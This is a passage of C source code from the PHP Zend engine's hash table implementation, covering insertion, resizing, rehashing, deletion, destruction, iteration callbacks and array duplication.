HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(idx);
HANDLE_UNBLOCK_INTERRUPTIONS();
return &p->val;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_add_or_update(HashTable *ht, zend_ulong h, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, h, pData, flag ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_add(HashTable *ht, zend_ulong h, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, h, pData, HASH_ADD ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_add_new(HashTable *ht, zend_ulong h, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, h, pData, HASH_ADD | HASH_ADD_NEW ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_update(HashTable *ht, zend_ulong h, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, h, pData, HASH_UPDATE ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_next_index_insert(HashTable *ht, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, ht->nNextFreeElement, pData, HASH_ADD | HASH_ADD_NEXT ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_next_index_insert_new(HashTable *ht, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, ht->nNextFreeElement, pData, HASH_ADD | HASH_ADD_NEW | HASH_ADD_NEXT ZEND_FILE_LINE_RELAY_CC);
}
static void ZEND_FASTCALL zend_hash_do_resize(HashTable *ht)
{
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nNumUsed > ht->nNumOfElements + (ht->nNumOfElements >> 5)) { /* additional term is there to amortize the cost of compaction */
HANDLE_BLOCK_INTERRUPTIONS();
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
} else if (ht->nTableSize < HT_MAX_SIZE) { /* Let's double the table size */
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
uint32_t nSize = ht->nTableSize + ht->nTableSize;
Bucket *old_buckets = ht->arData;
HANDLE_BLOCK_INTERRUPTIONS();
new_data = pemalloc(HT_SIZE_EX(nSize, -nSize), ht->u.flags & HASH_FLAG_PERSISTENT);
ht->nTableSize = nSize;
ht->nTableMask = -ht->nTableSize;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, ht->u.flags & HASH_FLAG_PERSISTENT);
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
} else {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", ht->nTableSize * 2, sizeof(Bucket) + sizeof(uint32_t), sizeof(Bucket));
}
}
ZEND_API int ZEND_FASTCALL zend_hash_rehash(HashTable *ht)
{
Bucket *p;
uint32_t nIndex, i;
IS_CONSISTENT(ht);
if (UNEXPECTED(ht->nNumOfElements == 0)) {
if (ht->u.flags & HASH_FLAG_INITIALIZED) {
ht->nNumUsed = 0;
HT_HASH_RESET(ht);
}
return SUCCESS;
}
HT_HASH_RESET(ht);
i = 0;
p = ht->arData;
if (ht->nNumUsed == ht->nNumOfElements) {
do {
nIndex = p->h | ht->nTableMask;
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(i);
p++;
} while (++i < ht->nNumUsed);
} else {
do {
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) {
uint32_t j = i;
Bucket *q = p;
if (EXPECTED(ht->u.v.nIteratorsCount == 0)) {
while (++i < ht->nNumUsed) {
p++;
if (EXPECTED(Z_TYPE_INFO(p->val) != IS_UNDEF)) {
ZVAL_COPY_VALUE(&q->val, &p->val);
q->h = p->h;
nIndex = q->h | ht->nTableMask;
q->key = p->key;
Z_NEXT(q->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(j);
if (UNEXPECTED(ht->nInternalPointer == i)) {
ht->nInternalPointer = j;
}
q++;
j++;
}
}
} else {
uint32_t iter_pos = zend_hash_iterators_lower_pos(ht, 0);
while (++i < ht->nNumUsed) {
p++;
if (EXPECTED(Z_TYPE_INFO(p->val) != IS_UNDEF)) {
ZVAL_COPY_VALUE(&q->val, &p->val);
q->h = p->h;
nIndex = q->h | ht->nTableMask;
q->key = p->key;
Z_NEXT(q->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(j);
if (UNEXPECTED(ht->nInternalPointer == i)) {
ht->nInternalPointer = j;
}
if (UNEXPECTED(i == iter_pos)) {
zend_hash_iterators_update(ht, i, j);
iter_pos = zend_hash_iterators_lower_pos(ht, iter_pos + 1);
}
q++;
j++;
}
}
}
ht->nNumUsed = j;
break;
}
nIndex = p->h | ht->nTableMask;
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(i);
p++;
} while (++i < ht->nNumUsed);
}
return SUCCESS;
}
static zend_always_inline void _zend_hash_del_el_ex(HashTable *ht, uint32_t idx, Bucket *p, Bucket *prev)
{
HANDLE_BLOCK_INTERRUPTIONS();
if (!(ht->u.flags & HASH_FLAG_PACKED)) {
if (prev) {
Z_NEXT(prev->val) = Z_NEXT(p->val);
} else {
HT_HASH(ht, p->h | ht->nTableMask) = Z_NEXT(p->val);
}
}
if (HT_IDX_TO_HASH(ht->nNumUsed - 1) == idx) {
do {
ht->nNumUsed--;
} while (ht->nNumUsed > 0 && (UNEXPECTED(Z_TYPE(ht->arData[ht->nNumUsed-1].val) == IS_UNDEF)));
}
ht->nNumOfElements--;
if (HT_IDX_TO_HASH(ht->nInternalPointer) == idx || UNEXPECTED(ht->u.v.nIteratorsCount)) {
uint32_t new_idx;
new_idx = idx = HT_HASH_TO_IDX(idx);
while (1) {
new_idx++;
if (new_idx >= ht->nNumUsed) {
new_idx = HT_INVALID_IDX;
break;
} else if (Z_TYPE(ht->arData[new_idx].val) != IS_UNDEF) {
break;
}
}
if (ht->nInternalPointer == idx) {
ht->nInternalPointer = new_idx;
}
zend_hash_iterators_update(ht, idx, new_idx);
}
if (p->key) {
zend_string_release(p->key);
}
if (ht->pDestructor) {
zval tmp;
ZVAL_COPY_VALUE(&tmp, &p->val);
ZVAL_UNDEF(&p->val);
ht->pDestructor(&tmp);
} else {
ZVAL_UNDEF(&p->val);
}
HANDLE_UNBLOCK_INTERRUPTIONS();
}
static zend_always_inline void _zend_hash_del_el(HashTable *ht, uint32_t idx, Bucket *p)
{
Bucket *prev = NULL;
if (!(ht->u.flags & HASH_FLAG_PACKED)) {
uint32_t nIndex = p->h | ht->nTableMask;
uint32_t i = HT_HASH(ht, nIndex);
if (i != idx) {
prev = HT_HASH_TO_BUCKET(ht, i);
while (Z_NEXT(prev->val) != idx) {
i = Z_NEXT(prev->val);
prev = HT_HASH_TO_BUCKET(ht, i);
}
}
}
_zend_hash_del_el_ex(ht, idx, p, prev);
}
ZEND_API void ZEND_FASTCALL zend_hash_del_bucket(HashTable *ht, Bucket *p)
{
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
_zend_hash_del_el(ht, HT_IDX_TO_HASH(p - ht->arData), p);
}
ZEND_API int ZEND_FASTCALL zend_hash_del(HashTable *ht, zend_string *key)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_string_hash_val(key);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->key == key) ||
(p->h == h &&
p->key &&
ZSTR_LEN(p->key) == ZSTR_LEN(key) &&
memcmp(ZSTR_VAL(p->key), ZSTR_VAL(key), ZSTR_LEN(key)) == 0)) {
_zend_hash_del_el_ex(ht, idx, p, prev);
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API int ZEND_FASTCALL zend_hash_del_ind(HashTable *ht, zend_string *key)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_string_hash_val(key);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->key == key) ||
(p->h == h &&
p->key &&
ZSTR_LEN(p->key) == ZSTR_LEN(key) &&
memcmp(ZSTR_VAL(p->key), ZSTR_VAL(key), ZSTR_LEN(key)) == 0)) {
if (Z_TYPE(p->val) == IS_INDIRECT) {
zval *data = Z_INDIRECT(p->val);
if (UNEXPECTED(Z_TYPE_P(data) == IS_UNDEF)) {
return FAILURE;
} else {
if (ht->pDestructor) {
zval tmp;
ZVAL_COPY_VALUE(&tmp, data);
ZVAL_UNDEF(data);
ht->pDestructor(&tmp);
} else {
ZVAL_UNDEF(data);
}
ht->u.v.flags |= HASH_FLAG_HAS_EMPTY_IND;
}
} else {
_zend_hash_del_el_ex(ht, idx, p, prev);
}
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API int ZEND_FASTCALL zend_hash_str_del_ind(HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_inline_hash_func(str, len);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->h == h)
&& p->key
&& (ZSTR_LEN(p->key) == len)
&& !memcmp(ZSTR_VAL(p->key), str, len)) {
if (Z_TYPE(p->val) == IS_INDIRECT) {
zval *data = Z_INDIRECT(p->val);
if (UNEXPECTED(Z_TYPE_P(data) == IS_UNDEF)) {
return FAILURE;
} else {
if (ht->pDestructor) {
ht->pDestructor(data);
}
ZVAL_UNDEF(data);
ht->u.v.flags |= HASH_FLAG_HAS_EMPTY_IND;
}
} else {
_zend_hash_del_el_ex(ht, idx, p, prev);
}
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API int ZEND_FASTCALL zend_hash_str_del(HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_inline_hash_func(str, len);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->h == h)
&& p->key
&& (ZSTR_LEN(p->key) == len)
&& !memcmp(ZSTR_VAL(p->key), str, len)) {
_zend_hash_del_el_ex(ht, idx, p, prev);
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API int ZEND_FASTCALL zend_hash_index_del(HashTable *ht, zend_ulong h)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
p = ht->arData + h;
if (Z_TYPE(p->val) != IS_UNDEF) {
_zend_hash_del_el_ex(ht, HT_IDX_TO_HASH(h), p, NULL);
return SUCCESS;
}
}
return FAILURE;
}
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->h == h) && (p->key == NULL)) {
_zend_hash_del_el_ex(ht, idx, p, prev);
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API void ZEND_FASTCALL zend_hash_destroy(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) <= 1);
if (ht->nNumUsed) {
p = ht->arData;
end = p + ht->nNumUsed;
if (ht->pDestructor) {
SET_INCONSISTENT(HT_IS_DESTROYING);
if (ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS)) {
if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
}
} while (++p != end);
}
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
SET_INCONSISTENT(HT_DESTROYED);
} else {
if (!(ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS))) {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
}
zend_hash_iterators_remove(ht);
} else if (EXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
return;
}
pefree(HT_GET_DATA_ADDR(ht), ht->u.flags & HASH_FLAG_PERSISTENT);
}
ZEND_API void ZEND_FASTCALL zend_array_destroy(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) <= 1);
/* break possible cycles */
GC_REMOVE_FROM_BUFFER(ht);
GC_TYPE_INFO(ht) = IS_NULL | (GC_WHITE << 16);
if (ht->nNumUsed) {
/* In some rare cases destructors of regular arrays may be changed */
if (UNEXPECTED(ht->pDestructor != ZVAL_PTR_DTOR)) {
zend_hash_destroy(ht);
goto free_ht;
}
p = ht->arData;
end = p + ht->nNumUsed;
SET_INCONSISTENT(HT_IS_DESTROYING);
if (ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS)) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
} while (++p != end);
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
zend_hash_iterators_remove(ht);
SET_INCONSISTENT(HT_DESTROYED);
} else if (EXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
goto free_ht;
}
efree(HT_GET_DATA_ADDR(ht));
free_ht:
FREE_HASHTABLE(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_clean(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nNumUsed) {
p = ht->arData;
end = p + ht->nNumUsed;
if (ht->pDestructor) {
if (ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS)) {
if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
}
} while (++p != end);
}
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
} else {
if (!(ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS))) {
if (ht->nNumUsed == ht->nNumOfElements) {
do {
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
}
}
if (!(ht->u.flags & HASH_FLAG_PACKED)) {
HT_HASH_RESET(ht);
}
}
ht->nNumUsed = 0;
ht->nNumOfElements = 0;
ht->nNextFreeElement = 0;
ht->nInternalPointer = HT_INVALID_IDX;
}
ZEND_API void ZEND_FASTCALL zend_symtable_clean(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nNumUsed) {
p = ht->arData;
end = p + ht->nNumUsed;
if (ht->u.flags & HASH_FLAG_STATIC_KEYS) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
} while (++p != end);
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
HT_HASH_RESET(ht);
}
ht->nNumUsed = 0;
ht->nNumOfElements = 0;
ht->nNextFreeElement = 0;
ht->nInternalPointer = HT_INVALID_IDX;
}
ZEND_API void ZEND_FASTCALL zend_hash_graceful_destroy(HashTable *ht)
{
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
p = ht->arData;
for (idx = 0; idx < ht->nNumUsed; idx++, p++) {
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (ht->u.flags & HASH_FLAG_INITIALIZED) {
pefree(HT_GET_DATA_ADDR(ht), ht->u.flags & HASH_FLAG_PERSISTENT);
}
SET_INCONSISTENT(HT_DESTROYED);
}
ZEND_API void ZEND_FASTCALL zend_hash_graceful_reverse_destroy(HashTable *ht)
{
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
idx = ht->nNumUsed;
p = ht->arData + ht->nNumUsed;
while (idx > 0) {
idx--;
p--;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (ht->u.flags & HASH_FLAG_INITIALIZED) {
pefree(HT_GET_DATA_ADDR(ht), ht->u.flags & HASH_FLAG_PERSISTENT);
}
SET_INCONSISTENT(HT_DESTROYED);
}
/* This is used to recurse elements and selectively delete certain entries
* from a hashtable. apply_func() receives the data and decides if the entry
* should be deleted or recursion should be stopped. The following three
* return codes are possible:
* ZEND_HASH_APPLY_KEEP - continue
* ZEND_HASH_APPLY_STOP - stop iteration
* ZEND_HASH_APPLY_REMOVE - delete the element, combineable with the former
*/
ZEND_API void ZEND_FASTCALL zend_hash_apply(HashTable *ht, apply_func_t apply_func)
{
uint32_t idx;
Bucket *p;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
for (idx = 0; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
result = apply_func(&p->val);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
break;
}
}
HASH_UNPROTECT_RECURSION(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_apply_with_argument(HashTable *ht, apply_func_arg_t apply_func, void *argument)
{
uint32_t idx;
Bucket *p;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
for (idx = 0; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
result = apply_func(&p->val, argument);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
break;
}
}
HASH_UNPROTECT_RECURSION(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_apply_with_arguments(HashTable *ht, apply_func_args_t apply_func, int num_args, ...)
{
uint32_t idx;
Bucket *p;
va_list args;
zend_hash_key hash_key;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
for (idx = 0; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
va_start(args, num_args);
hash_key.h = p->h;
hash_key.key = p->key;
result = apply_func(&p->val, num_args, args, &hash_key);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
va_end(args);
break;
}
va_end(args);
}
HASH_UNPROTECT_RECURSION(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_reverse_apply(HashTable *ht, apply_func_t apply_func)
{
uint32_t idx;
Bucket *p;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
idx = ht->nNumUsed;
while (idx > 0) {
idx--;
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
result = apply_func(&p->val);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
break;
}
}
HASH_UNPROTECT_RECURSION(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_copy(HashTable *target, HashTable *source, copy_ctor_func_t pCopyConstructor)
{
uint32_t idx;
Bucket *p;
zval *new_entry, *data;
zend_bool setTargetPointer;
IS_CONSISTENT(source);
IS_CONSISTENT(target);
HT_ASSERT(GC_REFCOUNT(target) == 1);
setTargetPointer = (target->nInternalPointer == HT_INVALID_IDX);
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (setTargetPointer && source->nInternalPointer == idx) {
target->nInternalPointer = HT_INVALID_IDX;
}
/* INDIRECT element may point to UNDEF-ined slots */
data = &p->val;
if (Z_TYPE_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
if (UNEXPECTED(Z_TYPE_P(data) == IS_UNDEF)) {
continue;
}
}
if (p->key) {
new_entry = zend_hash_update(target, p->key, data);
} else {
new_entry = zend_hash_index_update(target, p->h, data);
}
if (pCopyConstructor) {
pCopyConstructor(new_entry);
}
}
if (target->nInternalPointer == HT_INVALID_IDX && target->nNumOfElements > 0) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
}
static zend_always_inline int zend_array_dup_element(HashTable *source, HashTable *target, uint32_t idx, Bucket *p, Bucket *q, int packed, int static_keys, int with_holes)
{
zval *data = &p->val;
if (with_holes) {
if (!packed && Z_TYPE_INFO_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
}
if (UNEXPECTED(Z_TYPE_INFO_P(data) == IS_UNDEF)) {
return 0;
}
} else if (!packed) {
/* INDIRECT element may point to UNDEF-ined slots */
if (Z_TYPE_INFO_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
if (UNEXPECTED(Z_TYPE_INFO_P(data) == IS_UNDEF)) {
return 0;
}
}
}
do {
if (Z_OPT_REFCOUNTED_P(data)) {
if (Z_ISREF_P(data) && Z_REFCOUNT_P(data) == 1 &&
(Z_TYPE_P(Z_REFVAL_P(data)) != IS_ARRAY ||
Z_ARRVAL_P(Z_REFVAL_P(data)) != source)) {
data = Z_REFVAL_P(data);
if (!Z_OPT_REFCOUNTED_P(data)) {
break;
}
}
Z_ADDREF_P(data);
}
} while (0);
ZVAL_COPY_VALUE(&q->val, data);
q->h = p->h;
if (packed) {
q->key = NULL;
} else {
uint32_t nIndex;
q->key = p->key;
if (!static_keys && q->key) {
zend_string_addref(q->key);
}
nIndex = q->h | target->nTableMask;
Z_NEXT(q->val) = HT_HASH(target, nIndex);
HT_HASH(target, nIndex) = HT_IDX_TO_HASH(idx);
}
return 1;
}
static zend_always_inline void zend_array_dup_packed_elements(HashTable *source, HashTable *target, int with_holes)
{
Bucket *p = source->arData;
Bucket *q = target->arData;
Bucket *end = p + source->nNumUsed;
do {
if (!zend_array_dup_element(source, target, 0, p, q, 1, 1, with_holes)) {
if (with_holes) {
ZVAL_UNDEF(&q->val);
}
}
p++; q++;
} while (p != end);
}
static zend_always_inline uint32_t zend_array_dup_elements(HashTable *source, HashTable *target, int static_keys, int with_holes)
{
uint32_t idx = 0;
Bucket *p = source->arData;
Bucket *q = target->arData;
Bucket *end = p + source->nNumUsed;
do {
if (!zend_array_dup_element(source, target, idx, p, q, 0, static_keys, with_holes)) {
uint32_t target_idx = idx;
idx++; p++;
while (p != end) {
if (zend_array_dup_element(source, target, target_idx, p, q, 0, static_keys, with_holes)) {
if (source->nInternalPointer == idx) {
target->nInternalPointer = target_idx;
}
target_idx++; q++;
}
idx++; p++;
}
return target_idx;
}
idx++; p++; q++;
} while (p != end);
return idx;
}
ZEND_API HashTable* ZEND_FASTCALL zend_array_dup(HashTable *source)
{
uint32_t idx;
HashTable *target;
IS_CONSISTENT(source);
ALLOC_HASHTABLE(target);
GC_REFCOUNT(target) = 1;
GC_TYPE_INFO(target) = IS_ARRAY;
target->nTableSize = source->nTableSize;
target->pDestructor = source->pDestructor;
if (source->nNumUsed == 0) {
target->u.flags = (source->u.flags & ~(HASH_FLAG_INITIALIZED|HASH_FLAG_PACKED|HASH_FLAG_PERSISTENT|ZEND_HASH_APPLY_COUNT_MASK)) | HASH_FLAG_APPLY_PROTECTION | HASH_FLAG_STATIC_KEYS;
target->nTableMask = HT_MIN_MASK;
target->nNumUsed = 0;
target->nNumOfElements = 0;
target->nNextFreeElement = 0;
target->nInternalPointer = HT_INVALID_IDX;
HT_SET_DATA_ADDR(target, &uninitialized_bucket);
} else if (GC_FLAGS(source) & IS_ARRAY_IMMUTABLE) {
target->u.flags = (source->u.flags & ~HASH_FLAG_PERSISTENT) | HASH_FLAG_APPLY_PROTECTION;
target->nTableMask = source->nTableMask;
target->nNumUsed = source->nNumUsed;
target->nNumOfElements = source->nNumOfElements;
target->nNextFreeElement = source->nNextFreeElement;
HT_SET_DATA_ADDR(target, emalloc(HT_SIZE(target)));
target->nInternalPointer = source->nInternalPointer;
memcpy(HT_GET_DATA_ADDR(target), HT_GET_DATA_ADDR(source), HT_USED_SIZE(source));
if (target->nNumOfElements > 0 &&
target->nInternalPointer == HT_INVALID_IDX) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
} else if (source->u.flags & HASH_FLAG_PACKED) {
target->u.flags = (source->u.flags & ~(HASH_FLAG_PERSISTENT|ZEND_HASH_APPLY_COUNT_MASK)) | HASH_FLAG_APPLY_PROTECTION;
target->nTableMask = source->nTableMask;
target->nNumUsed = source->nNumUsed;
target->nNumOfElements = source->nNumOfElements;
target->nNextFreeElement = source->nNextFreeElement;
HT_SET_DATA_ADDR(target, emalloc(HT_SIZE(target)));
target->nInternalPointer = source->nInternalPointer;
HT_HASH_RESET_PACKED(target);
if (target->nNumUsed == target->nNumOfElements) {
zend_array_dup_packed_elements(source, target, 0);
} else {
zend_array_dup_packed_elements(source, target, 1);
}
if (target->nNumOfElements > 0 &&
target->nInternalPointer == HT_INVALID_IDX) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
} else {
target->u.flags = (source->u.flags & ~(HASH_FLAG_PERSISTENT|ZEND_HASH_APPLY_COUNT_MASK)) | HASH_FLAG_APPLY_PROTECTION;
target->nTableMask = source->nTableMask;
target->nNextFreeElement = source->nNextFreeElement;
target->nInternalPointer = source->nInternalPointer;
HT_SET_DATA_ADDR(target, emalloc(HT_SIZE(target)));
HT_HASH_RESET(target);
if (target->u.flags & HASH_FLAG_STATIC_KEYS) {
if (source->nNumUsed == source->nNumOfElements) {
idx = zend_array_dup_elements(source, target, 1, 0);
} else {
idx = zend_array_dup_elements(source, target, 1, 1);
}
} else {
if (source->nNumUsed == source->nNumOfElements) {
idx = zend_array_dup_elements(source, target, 0, 0);
} else {
idx = zend_array_dup_elements(source, target, 0, 1);
}
}
target->nNumUsed = idx;
